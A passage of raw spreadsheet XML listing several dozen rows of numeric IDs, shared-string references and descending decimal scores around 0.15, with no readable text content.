    <row r="27747" ht="15.75" customHeight="1">
      <c r="A27747" s="1">
        <v>25092.0</v>
      </c>
      <c r="B27747" s="2">
        <v>1.2919192E7</v>
      </c>
      <c r="C27747" s="2" t="s">
        <v>26667</v>
      </c>
      <c r="D27747" s="2">
        <v>1.0</v>
      </c>
      <c r="E27747" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27747" s="2">
        <v>0.1572504708097929</v>
      </c>
    </row>
    <row r="27748" ht="15.75" customHeight="1">
      <c r="A27748" s="1">
        <v>13366.0</v>
      </c>
      <c r="B27748" s="2">
        <v>3.4813558E7</v>
      </c>
      <c r="C27748" s="2" t="s">
        <v>26668</v>
      </c>
      <c r="D27748" s="2">
        <v>1.0</v>
      </c>
      <c r="E27748" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27748" s="2">
        <v>0.1569200779727096</v>
      </c>
    </row>
    <row r="27749" ht="15.75" customHeight="1">
      <c r="A27749" s="1">
        <v>19757.0</v>
      </c>
      <c r="B27749" s="2">
        <v>5.6710555E7</v>
      </c>
      <c r="C27749" s="2" t="s">
        <v>26669</v>
      </c>
      <c r="D27749" s="2">
        <v>1.0</v>
      </c>
      <c r="E27749" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27749" s="2">
        <v>0.1569200779727096</v>
      </c>
    </row>
    <row r="27750" ht="15.75" customHeight="1">
      <c r="A27750" s="1">
        <v>8587.0</v>
      </c>
      <c r="B27750" s="2">
        <v>5.4231043E7</v>
      </c>
      <c r="C27750" s="2" t="s">
        <v>26670</v>
      </c>
      <c r="D27750" s="2">
        <v>1.0</v>
      </c>
      <c r="E27750" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27750" s="2">
        <v>0.1561302681992337</v>
      </c>
    </row>
    <row r="27751" ht="15.75" customHeight="1">
      <c r="A27751" s="1">
        <v>25299.0</v>
      </c>
      <c r="B27751" s="2">
        <v>1.3412602E7</v>
      </c>
      <c r="C27751" s="2" t="s">
        <v>26671</v>
      </c>
      <c r="D27751" s="2">
        <v>1.0</v>
      </c>
      <c r="E27751" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27751" s="2">
        <v>0.1561302681992337</v>
      </c>
    </row>
    <row r="27752" ht="15.75" customHeight="1">
      <c r="A27752" s="1">
        <v>26103.0</v>
      </c>
      <c r="B27752" s="2">
        <v>1.5743373E7</v>
      </c>
      <c r="C27752" s="2" t="s">
        <v>26643</v>
      </c>
      <c r="D27752" s="2">
        <v>1.0</v>
      </c>
      <c r="E27752" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27752" s="2">
        <v>0.1557539682539683</v>
      </c>
    </row>
    <row r="27753" ht="15.75" customHeight="1">
      <c r="A27753" s="1">
        <v>1840.0</v>
      </c>
      <c r="B27753" s="2">
        <v>2.9407283E7</v>
      </c>
      <c r="C27753" s="2" t="s">
        <v>26672</v>
      </c>
      <c r="D27753" s="2">
        <v>1.0</v>
      </c>
      <c r="E27753" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27753" s="2">
        <v>0.1557239057239058</v>
      </c>
    </row>
    <row r="27754" ht="15.75" customHeight="1">
      <c r="A27754" s="1">
        <v>16466.0</v>
      </c>
      <c r="B27754" s="2">
        <v>4.6464496E7</v>
      </c>
      <c r="C27754" s="2" t="s">
        <v>26673</v>
      </c>
      <c r="D27754" s="2">
        <v>1.0</v>
      </c>
      <c r="E27754" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27754" s="2">
        <v>0.1549707602339182</v>
      </c>
    </row>
    <row r="27755" ht="15.75" customHeight="1">
      <c r="A27755" s="1">
        <v>20347.0</v>
      </c>
      <c r="B27755" s="2">
        <v>1.1629407E7</v>
      </c>
      <c r="C27755" s="2" t="s">
        <v>26674</v>
      </c>
      <c r="D27755" s="2">
        <v>1.0</v>
      </c>
      <c r="E27755" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27755" s="2">
        <v>0.1549707602339182</v>
      </c>
    </row>
    <row r="27756" ht="15.75" customHeight="1">
      <c r="A27756" s="1">
        <v>16288.0</v>
      </c>
      <c r="B27756" s="2">
        <v>4.5819345E7</v>
      </c>
      <c r="C27756" s="2" t="s">
        <v>26675</v>
      </c>
      <c r="D27756" s="2">
        <v>1.0</v>
      </c>
      <c r="E27756" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27756" s="2">
        <v>0.1544901065449011</v>
      </c>
    </row>
    <row r="27757" ht="15.75" customHeight="1">
      <c r="A27757" s="1">
        <v>18873.0</v>
      </c>
      <c r="B27757" s="2">
        <v>5.4056933E7</v>
      </c>
      <c r="C27757" s="2" t="s">
        <v>26676</v>
      </c>
      <c r="D27757" s="2">
        <v>1.0</v>
      </c>
      <c r="E27757" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27757" s="2">
        <v>0.1544901065449011</v>
      </c>
    </row>
    <row r="27758" ht="15.75" customHeight="1">
      <c r="A27758" s="1">
        <v>3396.0</v>
      </c>
      <c r="B27758" s="2">
        <v>3.8027085E7</v>
      </c>
      <c r="C27758" s="2" t="s">
        <v>26677</v>
      </c>
      <c r="D27758" s="2">
        <v>1.0</v>
      </c>
      <c r="E27758" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27758" s="2">
        <v>0.1540404040404041</v>
      </c>
    </row>
    <row r="27759" ht="15.75" customHeight="1">
      <c r="A27759" s="1">
        <v>34089.0</v>
      </c>
      <c r="B27759" s="2">
        <v>9691122.0</v>
      </c>
      <c r="C27759" s="2" t="s">
        <v>26678</v>
      </c>
      <c r="D27759" s="2">
        <v>1.0</v>
      </c>
      <c r="E27759" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27759" s="2">
        <v>0.1540404040404041</v>
      </c>
    </row>
    <row r="27760" ht="15.75" customHeight="1">
      <c r="A27760" s="1">
        <v>89.0</v>
      </c>
      <c r="B27760" s="2">
        <v>1.2024301E7</v>
      </c>
      <c r="C27760" s="2" t="s">
        <v>26679</v>
      </c>
      <c r="D27760" s="2">
        <v>1.0</v>
      </c>
      <c r="E27760" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27760" s="2">
        <v>0.153903903903904</v>
      </c>
    </row>
    <row r="27761" ht="15.75" customHeight="1">
      <c r="A27761" s="1">
        <v>28608.0</v>
      </c>
      <c r="B27761" s="2">
        <v>2.7105135E7</v>
      </c>
      <c r="C27761" s="2" t="s">
        <v>26674</v>
      </c>
      <c r="D27761" s="2">
        <v>1.0</v>
      </c>
      <c r="E27761" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27761" s="2">
        <v>0.1530214424951268</v>
      </c>
    </row>
    <row r="27762" ht="15.75" customHeight="1">
      <c r="A27762" s="1">
        <v>33977.0</v>
      </c>
      <c r="B27762" s="2">
        <v>9400149.0</v>
      </c>
      <c r="C27762" s="2" t="s">
        <v>26674</v>
      </c>
      <c r="D27762" s="2">
        <v>1.0</v>
      </c>
      <c r="E27762" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27762" s="2">
        <v>0.1530214424951268</v>
      </c>
    </row>
    <row r="27763" ht="15.75" customHeight="1">
      <c r="A27763" s="1">
        <v>7463.0</v>
      </c>
      <c r="B27763" s="2">
        <v>5.126402E7</v>
      </c>
      <c r="C27763" s="2" t="s">
        <v>26680</v>
      </c>
      <c r="D27763" s="2">
        <v>1.0</v>
      </c>
      <c r="E27763" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27763" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="27764" ht="15.75" customHeight="1">
      <c r="A27764" s="1">
        <v>7464.0</v>
      </c>
      <c r="B27764" s="2">
        <v>5.126402E7</v>
      </c>
      <c r="C27764" s="2" t="s">
        <v>26681</v>
      </c>
      <c r="D27764" s="2">
        <v>1.0</v>
      </c>
      <c r="E27764" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27764" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="27765" ht="15.75" customHeight="1">
      <c r="A27765" s="1">
        <v>15632.0</v>
      </c>
      <c r="B27765" s="2">
        <v>4.3578214E7</v>
      </c>
      <c r="C27765" s="2" t="s">
        <v>26682</v>
      </c>
      <c r="D27765" s="2">
        <v>1.0</v>
      </c>
      <c r="E27765" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27765" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="27766" ht="15.75" customHeight="1">
      <c r="A27766" s="1">
        <v>23267.0</v>
      </c>
      <c r="B27766" s="2">
        <v>5329042.0</v>
      </c>
      <c r="C27766" s="2" t="s">
        <v>26683</v>
      </c>
      <c r="D27766" s="2">
        <v>1.0</v>
      </c>
      <c r="E27766" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27766" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="27767" ht="15.75" customHeight="1">
      <c r="A27767" s="1">
        <v>26790.0</v>
      </c>
      <c r="B27767" s="2">
        <v>1.8578057E7</v>
      </c>
      <c r="C27767" s="2" t="s">
        <v>26684</v>
      </c>
      <c r="D27767" s="2">
        <v>1.0</v>
      </c>
      <c r="E27767" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27767" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="27768" ht="15.75" customHeight="1">
      <c r="A27768" s="1">
        <v>30068.0</v>
      </c>
      <c r="B27768" s="2">
        <v>3625178.0</v>
      </c>
      <c r="C27768" s="2" t="s">
        <v>26685</v>
      </c>
      <c r="D27768" s="2">
        <v>1.0</v>
      </c>
      <c r="E27768" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27768" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="27769" ht="15.75" customHeight="1">
      <c r="A27769" s="1">
        <v>24904.0</v>
      </c>
      <c r="B27769" s="2">
        <v>1.2310392E7</v>
      </c>
      <c r="C27769" s="2" t="s">
        <v>26686</v>
      </c>
      <c r="D27769" s="2">
        <v>1.0</v>
      </c>
      <c r="E27769" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27769" s="2">
        <v>0.1522988505747127</v>
      </c>
    </row>
    <row r="27770" ht="15.75" customHeight="1">
      <c r="A27770" s="1">
        <v>23865.0</v>
      </c>
      <c r="B27770" s="2">
        <v>8339758.0</v>
      </c>
      <c r="C27770" s="2" t="s">
        <v>26687</v>
      </c>
      <c r="D27770" s="2">
        <v>1.0</v>
      </c>
      <c r="E27770" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27770" s="2">
        <v>0.1520947176684882</v>
      </c>
    </row>
    <row r="27771" ht="15.75" customHeight="1">
      <c r="A27771" s="1">
        <v>22021.0</v>
      </c>
      <c r="B27771" s="2">
        <v>3.0016375E7</v>
      </c>
      <c r="C27771" s="2" t="s">
        <v>26688</v>
      </c>
      <c r="D27771" s="2">
        <v>1.0</v>
      </c>
      <c r="E27771" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27771" s="2">
        <v>0.1516007532956686</v>
      </c>
    </row>
    <row r="27772" ht="15.75" customHeight="1">
      <c r="A27772" s="1">
        <v>13671.0</v>
      </c>
      <c r="B27772" s="2">
        <v>3.6018025E7</v>
      </c>
      <c r="C27772" s="2" t="s">
        <v>26689</v>
      </c>
      <c r="D27772" s="2">
        <v>1.0</v>
      </c>
      <c r="E27772" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27772" s="2">
        <v>0.1514336917562725</v>
      </c>
    </row>
    <row r="27773" ht="15.75" customHeight="1">
      <c r="A27773" s="1">
        <v>865.0</v>
      </c>
      <c r="B27773" s="2">
        <v>2.1810682E7</v>
      </c>
      <c r="C27773" s="2" t="s">
        <v>26690</v>
      </c>
      <c r="D27773" s="2">
        <v>1.0</v>
      </c>
      <c r="E27773" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27773" s="2">
        <v>0.1510721247563353</v>
      </c>
    </row>
    <row r="27774" ht="15.75" customHeight="1">
      <c r="A27774" s="1">
        <v>10734.0</v>
      </c>
      <c r="B27774" s="2">
        <v>1.5303742E7</v>
      </c>
      <c r="C27774" s="2" t="s">
        <v>26691</v>
      </c>
      <c r="D27774" s="2">
        <v>1.0</v>
      </c>
      <c r="E27774" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27774" s="2">
        <v>0.150925925925926</v>
      </c>
    </row>
    <row r="27775" ht="15.75" customHeight="1">
      <c r="A27775" s="1">
        <v>31187.0</v>
      </c>
      <c r="B27775" s="2">
        <v>4913887.0</v>
      </c>
      <c r="C27775" s="2" t="s">
        <v>26692</v>
      </c>
      <c r="D27775" s="2">
        <v>1.0</v>
      </c>
      <c r="E27775" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27775" s="2">
        <v>0.1509259259259259</v>
      </c>
    </row>
    <row r="27776" ht="15.75" customHeight="1">
      <c r="A27776" s="1">
        <v>20016.0</v>
      </c>
      <c r="B27776" s="2">
        <v>5827347.0</v>
      </c>
      <c r="C27776" s="2" t="s">
        <v>26693</v>
      </c>
      <c r="D27776" s="2">
        <v>1.0</v>
      </c>
      <c r="E27776" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27776" s="2">
        <v>0.1503831417624522</v>
      </c>
    </row>
    <row r="27777" ht="15.75" customHeight="1">
      <c r="A27777" s="1">
        <v>25543.0</v>
      </c>
      <c r="B27777" s="2">
        <v>1.4277247E7</v>
      </c>
      <c r="C27777" s="2" t="s">
        <v>26694</v>
      </c>
      <c r="D27777" s="2">
        <v>1.0</v>
      </c>
      <c r="E27777" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27777" s="2">
        <v>0.1503831417624521</v>
      </c>
    </row>
    <row r="27778" ht="15.75" customHeight="1">
      <c r="A27778" s="1">
        <v>14929.0</v>
      </c>
      <c r="B27778" s="2">
        <v>4.1192062E7</v>
      </c>
      <c r="C27778" s="2" t="s">
        <v>26695</v>
      </c>
      <c r="D27778" s="2">
        <v>1.0</v>
      </c>
      <c r="E27778" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27778" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="27779" ht="15.75" customHeight="1">
      <c r="A27779" s="1">
        <v>27396.0</v>
      </c>
      <c r="B27779" s="2">
        <v>2.1797757E7</v>
      </c>
      <c r="C27779" s="2" t="s">
        <v>26696</v>
      </c>
      <c r="D27779" s="2">
        <v>1.0</v>
      </c>
      <c r="E27779" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27779" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="27780" ht="15.75" customHeight="1">
      <c r="A27780" s="1">
        <v>32347.0</v>
      </c>
      <c r="B27780" s="2">
        <v>5591840.0</v>
      </c>
      <c r="C27780" s="2" t="s">
        <v>26697</v>
      </c>
      <c r="D27780" s="2">
        <v>1.0</v>
      </c>
      <c r="E27780" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27780" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="27781" ht="15.75" customHeight="1">
      <c r="A27781" s="1">
        <v>26775.0</v>
      </c>
      <c r="B27781" s="2">
        <v>1.8498653E7</v>
      </c>
      <c r="C27781" s="2" t="s">
        <v>26698</v>
      </c>
      <c r="D27781" s="2">
        <v>1.0</v>
      </c>
      <c r="E27781" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27781" s="2">
        <v>0.1500829187396352</v>
      </c>
    </row>
    <row r="27782" ht="15.75" customHeight="1">
      <c r="A27782" s="1">
        <v>24526.0</v>
      </c>
      <c r="B27782" s="2">
        <v>1.1177324E7</v>
      </c>
      <c r="C27782" s="2" t="s">
        <v>26699</v>
      </c>
      <c r="D27782" s="2">
        <v>1.0</v>
      </c>
      <c r="E27782" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27782" s="2">
        <v>0.15</v>
      </c>
    </row>
    <row r="27783" ht="15.75" customHeight="1">
      <c r="A27783" s="1">
        <v>10748.0</v>
      </c>
      <c r="B27783" s="2">
        <v>1.5463372E7</v>
      </c>
      <c r="C27783" s="2" t="s">
        <v>26700</v>
      </c>
      <c r="D27783" s="2">
        <v>1.0</v>
      </c>
      <c r="E27783" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27783" s="2">
        <v>0.1497175141242938</v>
      </c>
    </row>
    <row r="27784" ht="15.75" customHeight="1">
      <c r="A27784" s="1">
        <v>28946.0</v>
      </c>
      <c r="B27784" s="2">
        <v>2.9693783E7</v>
      </c>
      <c r="C27784" s="2" t="s">
        <v>26701</v>
      </c>
      <c r="D27784" s="2">
        <v>1.0</v>
      </c>
      <c r="E27784" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27784" s="2">
        <v>0.1497175141242938</v>
      </c>
    </row>
    <row r="27785" ht="15.75" customHeight="1">
      <c r="A27785" s="1">
        <v>28557.0</v>
      </c>
      <c r="B27785" s="2">
        <v>2.6880477E7</v>
      </c>
      <c r="C27785" s="2" t="s">
        <v>26702</v>
      </c>
      <c r="D27785" s="2">
        <v>1.0</v>
      </c>
      <c r="E27785" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27785" s="2">
        <v>0.149641577060932</v>
      </c>
    </row>
    <row r="27786" ht="15.75" customHeight="1">
      <c r="A27786" s="1">
        <v>13371.0</v>
      </c>
      <c r="B27786" s="2">
        <v>3.4851852E7</v>
      </c>
      <c r="C27786" s="2" t="s">
        <v>26703</v>
      </c>
      <c r="D27786" s="2">
        <v>1.0</v>
      </c>
      <c r="E27786" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27786" s="2">
        <v>0.1491769547325103</v>
      </c>
    </row>
    <row r="27787" ht="15.75" customHeight="1">
      <c r="A27787" s="1">
        <v>20379.0</v>
      </c>
      <c r="B27787" s="2">
        <v>1.1881177E7</v>
      </c>
      <c r="C27787" s="2" t="s">
        <v>26704</v>
      </c>
      <c r="D27787" s="2">
        <v>1.0</v>
      </c>
      <c r="E27787" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27787" s="2">
        <v>0.1491769547325103</v>
      </c>
    </row>
    <row r="27788" ht="15.75" customHeight="1">
      <c r="A27788" s="1">
        <v>23750.0</v>
      </c>
      <c r="B27788" s="2">
        <v>7450288.0</v>
      </c>
      <c r="C27788" s="2" t="s">
        <v>26705</v>
      </c>
      <c r="D27788" s="2">
        <v>1.0</v>
      </c>
      <c r="E27788" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27788" s="2">
        <v>0.1491769547325103</v>
      </c>
    </row>
    <row r="27789" ht="15.75" customHeight="1">
      <c r="A27789" s="1">
        <v>24770.0</v>
      </c>
      <c r="B27789" s="2">
        <v>1.1866925E7</v>
      </c>
      <c r="C27789" s="2" t="s">
        <v>26706</v>
      </c>
      <c r="D27789" s="2">
        <v>1.0</v>
      </c>
      <c r="E27789" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27789" s="2">
        <v>0.1491769547325103</v>
      </c>
    </row>
    <row r="27790" ht="15.75" customHeight="1">
      <c r="A27790" s="1">
        <v>11984.0</v>
      </c>
      <c r="B27790" s="2">
        <v>2.5846449E7</v>
      </c>
      <c r="C27790" s="2" t="s">
        <v>26707</v>
      </c>
      <c r="D27790" s="2">
        <v>1.0</v>
      </c>
      <c r="E27790" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27790" s="2">
        <v>0.1490740740740741</v>
      </c>
    </row>
    <row r="27791" ht="15.75" customHeight="1">
      <c r="A27791" s="1">
        <v>19269.0</v>
      </c>
      <c r="B27791" s="2">
        <v>5.5154153E7</v>
      </c>
      <c r="C27791" s="2" t="s">
        <v>26708</v>
      </c>
      <c r="D27791" s="2">
        <v>1.0</v>
      </c>
      <c r="E27791" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27791" s="2">
        <v>0.148989898989899</v>
      </c>
    </row>
    <row r="27792" ht="15.75" customHeight="1">
      <c r="A27792" s="1">
        <v>22176.0</v>
      </c>
      <c r="B27792" s="2">
        <v>3.1679346E7</v>
      </c>
      <c r="C27792" s="2" t="s">
        <v>26709</v>
      </c>
      <c r="D27792" s="2">
        <v>1.0</v>
      </c>
      <c r="E27792" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27792" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="27793" ht="15.75" customHeight="1">
      <c r="A27793" s="1">
        <v>24769.0</v>
      </c>
      <c r="B27793" s="2">
        <v>1.1866925E7</v>
      </c>
      <c r="C27793" s="2" t="s">
        <v>26710</v>
      </c>
      <c r="D27793" s="2">
        <v>1.0</v>
      </c>
      <c r="E27793" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27793" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="27794" ht="15.75" customHeight="1">
      <c r="A27794" s="1">
        <v>20850.0</v>
      </c>
      <c r="B27794" s="2">
        <v>1.5719555E7</v>
      </c>
      <c r="C27794" s="2" t="s">
        <v>26711</v>
      </c>
      <c r="D27794" s="2">
        <v>1.0</v>
      </c>
      <c r="E27794" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27794" s="2">
        <v>0.1484674329501916</v>
      </c>
    </row>
    <row r="27795" ht="15.75" customHeight="1">
      <c r="A27795" s="1">
        <v>10885.0</v>
      </c>
      <c r="B27795" s="2">
        <v>1.6530372E7</v>
      </c>
      <c r="C27795" s="2" t="s">
        <v>26712</v>
      </c>
      <c r="D27795" s="2">
        <v>1.0</v>
      </c>
      <c r="E27795" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27795" s="2">
        <v>0.1484517304189436</v>
      </c>
    </row>
    <row r="27796" ht="15.75" customHeight="1">
      <c r="A27796" s="1">
        <v>26377.0</v>
      </c>
      <c r="B27796" s="2">
        <v>1.6968206E7</v>
      </c>
      <c r="C27796" s="2" t="s">
        <v>26696</v>
      </c>
      <c r="D27796" s="2">
        <v>1.0</v>
      </c>
      <c r="E27796" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27796" s="2">
        <v>0.1484517304189436</v>
      </c>
    </row>
    <row r="27797" ht="15.75" customHeight="1">
      <c r="A27797" s="1">
        <v>28819.0</v>
      </c>
      <c r="B27797" s="2">
        <v>2.8776512E7</v>
      </c>
      <c r="C27797" s="2" t="s">
        <v>26713</v>
      </c>
      <c r="D27797" s="2">
        <v>1.0</v>
      </c>
      <c r="E27797" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27797" s="2">
        <v>0.1484517304189436</v>
      </c>
    </row>
    <row r="27798" ht="15.75" customHeight="1">
      <c r="A27798" s="1">
        <v>34151.0</v>
      </c>
      <c r="B27798" s="2">
        <v>9859548.0</v>
      </c>
      <c r="C27798" s="2" t="s">
        <v>26714</v>
      </c>
      <c r="D27798" s="2">
        <v>1.0</v>
      </c>
      <c r="E27798" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27798" s="2">
        <v>0.1484517304189436</v>
      </c>
    </row>
    <row r="27799" ht="15.75" customHeight="1">
      <c r="A27799" s="1">
        <v>20514.0</v>
      </c>
      <c r="B27799" s="2">
        <v>1.3065719E7</v>
      </c>
      <c r="C27799" s="2" t="s">
        <v>26715</v>
      </c>
      <c r="D27799" s="2">
        <v>1.0</v>
      </c>
      <c r="E27799" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27799" s="2">
        <v>0.1484375000000001</v>
      </c>
    </row>
    <row r="27800" ht="15.75" customHeight="1">
      <c r="A27800" s="1">
        <v>31617.0</v>
      </c>
      <c r="B27800" s="2">
        <v>5144065.0</v>
      </c>
      <c r="C27800" s="2" t="s">
        <v>26716</v>
      </c>
      <c r="D27800" s="2">
        <v>1.0</v>
      </c>
      <c r="E27800" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27800" s="2">
        <v>0.1478873239436621</v>
      </c>
    </row>
    <row r="27801" ht="15.75" customHeight="1">
      <c r="A27801" s="1">
        <v>6167.0</v>
      </c>
      <c r="B27801" s="2">
        <v>4.7883151E7</v>
      </c>
      <c r="C27801" s="2" t="s">
        <v>26717</v>
      </c>
      <c r="D27801" s="2">
        <v>1.0</v>
      </c>
      <c r="E27801" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27801" s="2">
        <v>0.1478342749529191</v>
      </c>
    </row>
    <row r="27802" ht="15.75" customHeight="1">
      <c r="A27802" s="1">
        <v>28284.0</v>
      </c>
      <c r="B27802" s="2">
        <v>2.5515343E7</v>
      </c>
      <c r="C27802" s="2" t="s">
        <v>26718</v>
      </c>
      <c r="D27802" s="2">
        <v>1.0</v>
      </c>
      <c r="E27802" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27802" s="2">
        <v>0.1478342749529191</v>
      </c>
    </row>
    <row r="27803" ht="15.75" customHeight="1">
      <c r="A27803" s="1">
        <v>14846.0</v>
      </c>
      <c r="B27803" s="2">
        <v>4.1061854E7</v>
      </c>
      <c r="C27803" s="2" t="s">
        <v>26719</v>
      </c>
      <c r="D27803" s="2">
        <v>1.0</v>
      </c>
      <c r="E27803" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27803" s="2">
        <v>0.1472663139329807</v>
      </c>
    </row>
    <row r="27804" ht="15.75" customHeight="1">
      <c r="A27804" s="1">
        <v>26325.0</v>
      </c>
      <c r="B27804" s="2">
        <v>1.6693701E7</v>
      </c>
      <c r="C27804" s="2" t="s">
        <v>26720</v>
      </c>
      <c r="D27804" s="2">
        <v>1.0</v>
      </c>
      <c r="E27804" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27804" s="2">
        <v>0.1472663139329807</v>
      </c>
    </row>
    <row r="27805" ht="15.75" customHeight="1">
      <c r="A27805" s="1">
        <v>24692.0</v>
      </c>
      <c r="B27805" s="2">
        <v>1.1629406E7</v>
      </c>
      <c r="C27805" s="2" t="s">
        <v>26674</v>
      </c>
      <c r="D27805" s="2">
        <v>1.0</v>
      </c>
      <c r="E27805" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27805" s="2">
        <v>0.1471734892787525</v>
      </c>
    </row>
    <row r="27806" ht="15.75" customHeight="1">
      <c r="A27806" s="1">
        <v>5801.0</v>
      </c>
      <c r="B27806" s="2">
        <v>4.6784675E7</v>
      </c>
      <c r="C27806" s="2" t="s">
        <v>26721</v>
      </c>
      <c r="D27806" s="2">
        <v>1.0</v>
      </c>
      <c r="E27806" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27806" s="2">
        <v>0.147119341563786</v>
      </c>
    </row>
    <row r="27807" ht="15.75" customHeight="1">
      <c r="A27807" s="1">
        <v>10173.0</v>
      </c>
      <c r="B27807" s="2">
        <v>5.7376045E7</v>
      </c>
      <c r="C27807" s="2" t="s">
        <v>26722</v>
      </c>
      <c r="D27807" s="2">
        <v>1.0</v>
      </c>
      <c r="E27807" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27807" s="2">
        <v>0.1468797564687976</v>
      </c>
    </row>
    <row r="27808" ht="15.75" customHeight="1">
      <c r="A27808" s="1">
        <v>9849.0</v>
      </c>
      <c r="B27808" s="2">
        <v>5.6690817E7</v>
      </c>
      <c r="C27808" s="2" t="s">
        <v>26723</v>
      </c>
      <c r="D27808" s="2">
        <v>1.0</v>
      </c>
      <c r="E27808" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27808" s="2">
        <v>0.1468253968253969</v>
      </c>
    </row>
    <row r="27809" ht="15.75" customHeight="1">
      <c r="A27809" s="1">
        <v>17008.0</v>
      </c>
      <c r="B27809" s="2">
        <v>4.8429595E7</v>
      </c>
      <c r="C27809" s="2" t="s">
        <v>26724</v>
      </c>
      <c r="D27809" s="2">
        <v>1.0</v>
      </c>
      <c r="E27809" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27809" s="2">
        <v>0.1466302367941713</v>
      </c>
    </row>
    <row r="27810" ht="15.75" customHeight="1">
      <c r="A27810" s="1">
        <v>31090.0</v>
      </c>
      <c r="B27810" s="2">
        <v>4.8412633E7</v>
      </c>
      <c r="C27810" s="2" t="s">
        <v>26713</v>
      </c>
      <c r="D27810" s="2">
        <v>1.0</v>
      </c>
      <c r="E27810" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27810" s="2">
        <v>0.1466302367941713</v>
      </c>
    </row>
    <row r="27811" ht="15.75" customHeight="1">
      <c r="A27811" s="1">
        <v>25742.0</v>
      </c>
      <c r="B27811" s="2">
        <v>1.4594622E7</v>
      </c>
      <c r="C27811" s="2" t="s">
        <v>26725</v>
      </c>
      <c r="D27811" s="2">
        <v>1.0</v>
      </c>
      <c r="E27811" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27811" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="27812" ht="15.75" customHeight="1">
      <c r="A27812" s="1">
        <v>31828.0</v>
      </c>
      <c r="B27812" s="2">
        <v>5253711.0</v>
      </c>
      <c r="C27812" s="2" t="s">
        <v>26726</v>
      </c>
      <c r="D27812" s="2">
        <v>1.0</v>
      </c>
      <c r="E27812" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27812" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="27813" ht="15.75" customHeight="1">
      <c r="A27813" s="1">
        <v>33161.0</v>
      </c>
      <c r="B27813" s="2">
        <v>7086085.0</v>
      </c>
      <c r="C27813" s="2" t="s">
        <v>26727</v>
      </c>
      <c r="D27813" s="2">
        <v>1.0</v>
      </c>
      <c r="E27813" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F27813" s="2">
        <v>0.146322378716745</v>
      </c>
    </row>
    <row r="27814" ht="15.75" customHeight="1">
